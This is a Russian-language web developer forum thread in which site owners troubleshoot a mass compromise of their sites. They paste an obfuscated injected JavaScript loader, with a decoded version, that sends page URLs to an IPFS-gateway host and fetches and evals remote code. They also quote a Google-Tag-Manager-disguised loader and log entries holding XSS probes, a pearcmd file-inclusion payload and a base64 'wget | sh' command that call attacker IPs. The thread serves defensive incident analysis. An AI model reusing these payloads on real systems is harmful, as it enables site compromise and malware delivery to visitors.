Разработчикам

Взломаны сайты в честь дня конституции украины

Пользователь 93386 Эксперт Сообщений: 1119 Баллов: 180 Регистрация: 13.06.2011	#876 06.02.2024 17:01:26 Тоже вопрос - а контроль целостности помогает определить изменения в файлах? Я вот сегодня сделал на своих проектах на всякий пж слепки ...

Пользователь 4097266

Постоянный посетитель

Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020

#877

06.02.2024 19:56:38

Цитата

написал:

Цитата
написал: В отладчике

Такая же проблема, подскажите, нашли источник?

Источник нет. На сайте выполняется этот скрипт

Код

!window['\x5f\x5f\x65\x78\x6f\x63\x6c\x69\x63\x6b' + '\x5f\x5f\x61\x64\x73\x5f\x5f\x73\x68\x6f' + '\x77'] && (window['\x5f\x5f\x65\x78\x6f\x63\x6c\x69\x63\x6b' + '\x5f\x5f\x61\x64\x73\x5f\x5f\x73\x68\x6f' + '\x77'] = '\x31',
(function() {
    var _0x5d2ae4 = window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66'];
    fetch('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61' + '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73' + '\x2e\x36\x39\x2e\x6d\x75\x2f\x70\x72\x6f' + '\x62\x65\x2f\x76\x31\x2f' + _0x5d2ae4),
    fetch('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61' + '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73' + '\x2e\x36\x39\x2e\x6d\x75\x2f\x70\x61\x79' + '\x6c\x6f\x61\x64\x2f\x76\x31')['\x74\x68\x65\x6e'](_0x3faf80=>{
        return _0x3faf80['\x74\x65\x78\x74']();
    }
    )['\x74\x68\x65\x6e'](_0x549b7f=>{
        _0x549b7f && _0x549b7f['\x73\x74\x61\x72\x74\x73\x57\x69\x74\x68']('\x68\x74\x74\x70') && fetch(_0x549b7f)['\x74\x68\x65\x6e'](_0x1eb34c=>_0x1eb34c['\x74\x65\x78\x74']())['\x74\x68\x65\x6e'](_0x5b2773=>eval(_0x5b2773));
    }
    ),
    setInterval(function() {
        var _0x33417b = Date['\x6e\x6f\x77']();
        debugger ;var _0x3a3f12 = Date['\x6e\x6f\x77']();
        if (_0x3a3f12 - _0x33417b > 0x3e8) {
            fetch('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61' + '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73' + '\x2e\x36\x39\x2e\x6d\x75\x2f\x64\x65\x62' + '\x75\x67\x2f\x76\x31' + window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x6f\x73\x74']);
            for (var _0x53089b = 0x5; _0x53089b > 0x3; _0x53089b = _0x53089b + 0x1) {
                console['\x6c\x6f\x67'](_0x53089b);
            }
        }
    }, 0x64);
}()));

В расшифрованном виде получается что-то такое

Код

!window['__exoclik' + ' __ads_sho' + 'w'] && (window['__exoclik' + '__ads_sho' + 'w']
(function() {
    var _0x5d2ae4 = window['location']['href'];
    fetch('https://ga' + 'teway.ipfs' + '.69.mu/pro' + 'be/v1/' + _0x5d2ae4),
    fetch('https://ga' + 'teway.ipfs' + '.69.mu/pay' + 'load/v1')['then'](_0x3faf80=>{
        return _0x3faf80['text']();
    })['then'](_0x549b7f=>
        _0x549b7f && _0x549b7f['startsWith']('http') && fetch(_0x549b7f)['then'](_0x1eb34c=>_0x1eb34c['text']())['then'](_0x5b2773=>eval(_0x5b2773));
    }),
    setInterval(function() {
        var _0x33417b = Date['now']();
        debugger; var __0x3a3f12 = Date['now']();
        if(_0x3a3f12 - _0x33417b > 0x3e8) {
            fetch('https://ga' + 'teway.ipfs' + '.69.mu/deb' + 'ug/v1' +window['location']['host']);
            for (var _0x53089b = 0x5; _0x53089b > 0x3; _0x53089b = _0x53089b + 0x1) {
            console['log'](_0x53089b);
            }
        }
    }, 0x64);
}()));

Он подгружает несколько скриптов с gateway.pinata.cloud:

gateway.pinata.cloud/ipfs/QmeFQQveaX32GqrauAuj9uBqBGQbUB7NHcmr96aoeeiVV8
gateway.pinata.cloud/ipfs/QmQ9t1MbZnmEayTmcSqSyMiLNRCCiZiviWdNXYAhHDDVdZ

Как временное решение в nginx (/etc/nginx/bx/conf/bitrix_block.conf) прописал для ip этого сайта

Код
deny 104.18.33.31;

Далее перезагрузил nginx - service nginx restart

Не знаю насколько это работает)

Пользователь 4097266

Постоянный посетитель

Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020

#878

06.02.2024 19:58:20

Цитата
написал: У меня простой вопрос. Вы установили бесплатный модуль Проактивной защиты, который уже ставится со Старта?

Модуль Проактивной защиты установлен сразу из коробки

Пользователь 4097266

Постоянный посетитель

Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020

#879

06.02.2024 20:00:37

Цитата
написал: Тоже вопрос - а контроль целостности помогает определить изменения в файлах? Я вот сегодня сделал на своих проектах на всякий пж слепки ...

У нас слепок не актуальный, от 01.07.2022, поэтому не могу сказать

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#880

06.02.2024 21:00:42

Цитата

написал:

Цитата
написал: У меня простой вопрос. Вы установили бесплатный модуль Проактивной защиты, который уже ставится со Старта?

Модуль Проактивной защиты установлен сразу из коробки

Посмотри журнал проактивной защиты, прогони все тесты в нем. Включи все опции

Пользователь 4097266

Постоянный посетитель

Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020

#881

06.02.2024 21:35:51

Цитата

написал:

Цитата

написал:

Цитата
написал: У меня простой вопрос. Вы установили бесплатный модуль Проактивной защиты, который уже ставится со Старта?

Модуль Проактивной защиты установлен сразу из коробки

Посмотри журнал проактивной защиты, прогони все тесты в нем. Включи все опции

В журнале постоянные попытки, примеры записей

Код

/search/?q=%3CScript%3Ealert%28%27XSS%27%29%3C%2FscripT%3E

/bitrix/tools/landing/ajax.php?site=s1

/bitrix/tools/landing/ajax.php?site=s2

/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>

/index.php?lang=../. ./. ./. ./. ./. ./. ./. ./usr/local/lib/php/pearcmd&+config-create+/&/<?eval(base64_decode('aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9'));?>+/tmp/index.php

/index.php?lang=../. ./. ./. ./. ./. ./. ./. ./tmp/index

/index.php?s=index/index/index/think_lang/. ./. ./extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=|base64${IFS}-d|sh

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#882

07.02.2024 04:22:59

Цитата
Максим Егоров написал: В журнале постоянные попытки, примеры записей

на попытки забейте - это нормальная история, ищите "не попытки", всё что 404 смысла нет смотреть (имхо)

Цитата
Максим Егоров написал: На сайте выполняется этот скрипт

Вы же понимаете, что фронт без бэка сам выполняться не начнёт - ищите откуда "ноги растут" и результат плс в студию

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 93386 Эксперт Сообщений: 1119 Баллов: 180 Регистрация: 13.06.2011	#883 07.02.2024 10:22:10 Как вариант найти откуда подключается скрипт - сделать бэкап проекта, развернуть его в VirtualBox, далее через VScode с remote SSH подключиться и дебагом прямо пройти от начала выполнения страницы.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#884

07.02.2024 10:43:42

Цитата
Владислав Голубев написал: Как вариант найти откуда подключается скрипт - сделать бэкап проекта, развернуть его в VirtualBox, далее через VScode с remote SSH подключиться и дебагом прямо пройти от начала выполнения страницы.

Ну так то для дебага совсем не обязательно VirtualBox + VScode. Я например юзаю VMWare + PHPStorm, реже Docker + PHPStorm. Вообще да - дебаг самое надёжное решение для любой возможной ситуации.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#885

07.02.2024 19:12:56

Цитата
написал: В журнале постоянные попытки, примеры записей

а сканирование сделали модулем проактивной защиты?

Пользователь 4097266 Постоянный посетитель Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020	#886 09.02.2024 13:53:27 У кого вирус тоже шаблон Астор?)

Пользователь 90382

Посетитель

Сообщений: 54 Баллов: 8 Регистрация: 13.05.2011

#887

09.02.2024 17:51:50

Цитата

написал:

Цитата

написал:

Цитата
написал: В отладчике

Такая же проблема, подскажите, нашли источник?

Источник нет. На сайте выполняется этот скрипт

Код

 !window[ '\x5f\x5f\x65\x78\x6f\x63\x6c\x69\x63\x6b'  +  '\x5f\x5f\x61\x64\x73\x5f\x5f\x73\x68\x6f'  +  '\x77' ] && (window[ '\x5f\x5f\x65\x78\x6f\x63\x6c\x69\x63\x6b'  +  '\x5f\x5f\x61\x64\x73\x5f\x5f\x73\x68\x6f'  +  '\x77' ] =  '\x31' ,
(  function  ()  { 
     var  _0x5d2ae4 = window[ '\x6c\x6f\x63\x61\x74\x69\x6f\x6e' ][ '\x68\x72\x65\x66' ];
    fetch( '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61'  +  '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73'  +  '\x2e\x36\x39\x2e\x6d\x75\x2f\x70\x72\x6f'  +  '\x62\x65\x2f\x76\x31\x2f'  + _0x5d2ae4),
    fetch( '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61'  +  '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73'  +  '\x2e\x36\x39\x2e\x6d\x75\x2f\x70\x61\x79'  +  '\x6c\x6f\x61\x64\x2f\x76\x31' )[ '\x74\x68\x65\x6e' ](_0x3faf80=>{
         return  _0x3faf80[ '\x74\x65\x78\x74' ]();
    }
    )[ '\x74\x68\x65\x6e' ](_0x549b7f=>{
        _0x549b7f && _0x549b7f[ '\x73\x74\x61\x72\x74\x73\x57\x69\x74\x68' ]( '\x68\x74\x74\x70' ) && fetch(_0x549b7f)[ '\x74\x68\x65\x6e' ](_0x1eb34c=>_0x1eb34c[ '\x74\x65\x78\x74' ]())[ '\x74\x68\x65\x6e' ](_0x5b2773=> eval (_0x5b2773));
    }
    ),
    setInterval(  function  ()  { 
         var  _0x33417b = Date[ '\x6e\x6f\x77' ]();
        debugger ; var  _0x3a3f12 = Date[ '\x6e\x6f\x77' ]();
         if  (_0x3a3f12 - _0x33417b >  0x3e8 ) {
            fetch( '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61'  +  '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73'  +  '\x2e\x36\x39\x2e\x6d\x75\x2f\x64\x65\x62'  +  '\x75\x67\x2f\x76\x31'  + window[ '\x6c\x6f\x63\x61\x74\x69\x6f\x6e' ][ '\x68\x6f\x73\x74' ]);
             for  ( var  _0x53089b =  0x5 ; _0x53089b >  0x3 ; _0x53089b = _0x53089b +  0x1 ) {
                console[ '\x6c\x6f\x67' ](_0x53089b);
            }
        }
    },  0x64 );
}()));

В расшифрованном виде получается что-то такое

Код

 !window[ '__exoclik'  +  ' __ads_sho'  +  'w' ] && (window[ '__exoclik'  +  '__ads_sho'  +  'w' ]
(  function  ()  { 
     var  _0x5d2ae4 = window[ 'location' ][ 'href' ];
    fetch( 'https://ga'  +  'teway.ipfs'  +  '.69.mu/pro'  +  'be/v1/'  + _0x5d2ae4),
    fetch( 'https://ga'  +  'teway.ipfs'  +  '.69.mu/pay'  +  'load/v1' )[ 'then' ](_0x3faf80=>{
         return  _0x3faf80[ 'text' ]();
    })[ 'then' ](_0x549b7f=>
        _0x549b7f && _0x549b7f[ 'startsWith' ]( 'http' ) && fetch(_0x549b7f)[ 'then' ](_0x1eb34c=>_0x1eb34c[ 'text' ]())[ 'then' ](_0x5b2773=> eval (_0x5b2773));
    }),
    setInterval(  function  ()  { 
         var  _0x33417b = Date[ 'now' ]();
        debugger;  var  __0x3a3f12 = Date[ 'now' ]();
         if (_0x3a3f12 - _0x33417b >  0x3e8 ) {
            fetch( 'https://ga'  +  'teway.ipfs'  +  '.69.mu/deb'  +  'ug/v1'  +window[ 'location' ][ 'host' ]);
             for  ( var  _0x53089b =  0x5 ; _0x53089b >  0x3 ; _0x53089b = _0x53089b +  0x1 ) {
            console[ 'log' ](_0x53089b);
            }
        }
    },  0x64 );
}()));

Код
deny 104.18.33.31 ;

Далее перезагрузил nginx - service nginx restart

Не знаю насколько это работает)

Два дня убил на поиск откуда этот скрипт лезет, итог поиска дал свои результаты. Лезет из

Код

(function(w,d,s,l,i,j,k,m){w[s]||(w[s]=1,w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c)))})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtTm1TZlljbThSYm5YUEVvWnJkVHpEdjdpTGY0ekVUaEVrem1penFjZVdDUEE=','e249af6d')

именно он подгружает вирус, а вот где лежит этот сам googletagmanager так и не получилось найти, есть подозрение в что одном из файлов webp. Временное решение это вырезать этот код на уровне сервера, что собственно и сделал пока не найдётся полное решение.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#888

09.02.2024 21:05:20

Цитата
написал: именно он подгружает вирус, а вот где лежит этот сам googletagmanager так и не получилось найти,

Сам ГуглТаг обычно в хедере прописывают, или футере (реже).

Пользователь 90382

Посетитель

Сообщений: 54 Баллов: 8 Регистрация: 13.05.2011

#889

09.02.2024 21:58:38

Цитата

написал:

Цитата
написал: именно он подгружает вирус, а вот где лежит этот сам googletagmanager так и не получилось найти,

Сам ГуглТаг обычно в хедере прописывают, или футере (реже).

нет это не шаблонный googletagmanager из header или footer, он его грузит ещё до буфера шаблона.

Решение посоветовали такое и вроде как оно сработало.

Код

Добрый день, если ещё не решили с вирусом проблему.Была аналогичная проблема с 2 февраля, появлялись фреймы с …googletagmanager… и капчей с вирусом для пользователей.
Причина: использовали уязвимость старого сервера Centos 6 
Решение: добавить в опциях memcached на сервере (у меня это /etc/sysconfig) собственный айпишник localhost 
OPTIONS="-U 0 -l 127.0.0.1"
И перезапуск сервера.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#890

10.02.2024 04:37:04

Цитата
Артём написал: Причина: использовали уязвимость старого сервера Centos 6 Решение: добавить в опциях memcached на сервере (у меня это /etc/sysconfig) собственный айпишник localhost OPTIONS="-U 0 -l 127.0.0.1" И перезапуск сервера.

Ну вот - и движек то не при делах.
Хорошая новость.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#891

11.02.2024 09:14:17

Цитата
написал: Решение посоветовали такое и вроде как оно сработало.

Этой уязвимости уже лет 5 наверно.
У меня сервера еще на Хецнере были тогда, Хецнер начал сильно ругаться, что есть уязвимость.

Пользователь 4097266

Постоянный посетитель

Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020

#892

11.02.2024 21:13:09

Код
Причина: использовали уязвимость старого сервера Centos 6

У нас версия 7.9

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#893

12.02.2024 05:33:45

Цитата
Максим Егоров написал: У нас версия 7.9

понятно, значит не то ...
так и не нашли дыру?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7923188 Заглянувший Сообщений: 5 Регистрация: 12.02.2024	#894 12.02.2024 08:52:06 Коллеги. Такая же проблема на двух сайтах. обновление стоит последнее, все защитники включены. если кто то нашел решение буду благодарен.

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#895 12.02.2024 08:56:52 можете ссылку на паблик скинуть? хоть гляну как это выглядит Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7923188 Заглянувший Сообщений: 5 Регистрация: 12.02.2024	#896 12.02.2024 08:59:30 Написал Вам в личку ссылку

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#897

12.02.2024 09:06:46

Цитата
Андрей Молодцов написал: Написал Вам в личку ссылку

походил по каталогу - не моделируется

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 108671 Постоянный посетитель Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011	#898 12.02.2024 09:10:15 дайте ссылку на сайт. Нет такого зверя, которого невозможно пристрелить ))

Пользователь 7923188 Заглянувший Сообщений: 5 Регистрация: 12.02.2024	#899 12.02.2024 09:26:06 Отправил ссылку в личку

Пользователь 4097266

Постоянный посетитель

Сообщений: 88 Баллов: 14 Регистрация: 06.04.2020

#900

12.02.2024 09:36:44

Цитата

написал:

Цитата
Максим Егоров написал: У нас версия 7.9

понятно, значит не то ...
так и не нашли дыру?

Нет. Восстановили бэкап до взлома, сейчас не появляется, а причину пока не нашли.

У нас на странице подключается googletagmanager 5 раз и что удивительно все сводится в папку include от Астора. В трех местах подключается, где их компонент соц сетей подгружается и под баннером с меню футера. Посмотреть, что в include файлах в зараженном бэкапе не можем, потому что у нас многосайтовость и сортировка выше у второго сайта, их файлы развернулись.

И тут такой момент, что в админке тоже появлялась "капча", но стоит оговориться, что в админке стало появляться не сразу, только на второй день.

Еще из интересных логах за тот день, когда заметили вирус:

Код

78.153.140.224 - -[04/Feb/2024:01:51:14 +0300 - -] 301 "GET /.env HTTP/1.1" 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [04/Feb/2024:01:51:14 +0300 - -] 400 "\x16\x03\x01\x00\xDE\x01\x00\x00\xDA\x03\x03\xF6\x1CK\xAB\x0E\x02YU\x95v\x0E\x17d(\x1D\xE4H\x01G%\x0Fi\x85" 150 "-" "-" "-"
78.153.140.224 - - [04/Feb/2024:01:51:14 +0300 - 0.174] 404 "GET /.env HTTP/1.1" 70555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [03/Feb/2024:13:32:43 +0300 - -] 302 "GET /.env HTTP/1.1" 138 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [03/Feb/2024:13:32:44 +0300 - 0.174] 404 "GET /.env HTTP/1.1" 70557 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
78.153.140.224 - - [03/Feb/2024:13:32:44 +0300 - 0.172] 404 "GET /.env HTTP/1.1" 70558 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
68.183.140.104 - - [04/Feb/2024:02:02:01 +0300 - -] 400 "\x15\x03\x03\x00\x02\x02F" 150 "-" "-" "-"
68.183.140.104 - -[04/Feb/2024:02:02:02 +0300 - 0.000] 403 "GET /bitrix/redirect.php?goto=http://orgausa.com HTTP/1.1" 242 "https://***.ru/bitrix/redirect.php?goto=http://orgausa.com" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68" "-"
198.235.24.16 - - [04/Feb/2024:02:19:53 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "-" "-"
198.235.24.16 - - [04/Feb/2024:02:19:55 +0300 - 0.001] 400 "GET / HTTP/1.1" 407 "http://наш ip:80/" "-" "-"

P.S. Сегодня на другом сайте ночью пытались массово удалить пользователей и не удалось из-за настроек битрикса:

a:2:{s:4:"user";s:29:"Дмитрий ***";s:3:"err";s:206:"Ошибка при удалении в модуле sale: Пользователь #10429 имеет заказы в модуле Интернет-магазина и не может быть удален.";}

Пару дней уже на этом сайте боты массово заполняют формы, да и во всех инпутах, каких можно sql-инъекции ищут

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером